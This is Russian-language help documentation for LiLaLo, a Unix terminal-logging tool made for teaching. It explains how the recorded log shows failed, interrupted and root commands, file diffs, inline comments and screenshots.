Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l

bash: l: command not found
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4
Обратите внимание на то, что код завершения команды может быть отличен от нуля не только в тех случаях, когда команда была выполнена с ошибкой. Многие команды используют код завершения, например, для того чтобы показать результаты проверки

Команды, ход выполнения которых был прерван пользователем, выделяются цветом.

$ find / -name abc

find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C

Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id

uid=0(root) gid=0(root) Gruppen=0(root)
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc

2a3,5 > if [ -f /usr/local/etc/bash_completion ]; then > . /usr/local/etc/bash_completion > fi
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
$ patch ~/.bashrc
В данном случае изменения применяются к файлу ~/.bashrc
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.

Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
```
$ whoami
```
```
user
```
```
$ #^ Интересно, кто я?
```
в журнале это будет выглядеть так:
```
$ whoami
```
```
user
```
Интересно, кто я?

Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:

$ whoami

user

$ cat > /dev/null #^ Интересно, кто я?

Программа whoami выводит имя пользователя, под которым 
мы зарегистрировались в системе.
-
Она не может ответить на вопрос о нашем назначении 
в этом мире.

В журнале это будет выглядеть так:

$ whoami

user

Интересно, кто я?

Программа whoami выводит имя пользователя, под которым
мы зарегистрировались в системе.

Она не может ответить на вопрос о нашем назначении
в этом мире.

Для разделения нескольких абзацев между собой используйте символ "-", один в строке.

Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=

Содержимое файла может быть показано в журнале. Для этого его нужно вывести с помощью программы cat. Если вывод команды отметить симоволами #!, содержимое файла будет показано в журнале в специально отведённой для этого секции.

Для того чтобы вставить скриншот интересующего вас окна в журнал, нужно воспользоваться командой l3shot. После того как команда вызвана, нужно с помощью мыши выбрать окно, которое должно быть в журнале.

Команды в журнале расположены в хронологическом порядке. Если две команды давались одна за другой, но на разных терминалах, в журнале они будут рядом, даже если они не имеют друг к другу никакого отношения.
```
1
    2
3   
    4
```
Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сенса, нужно щёкнуть по этому названию.

О программе

LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008

$Id$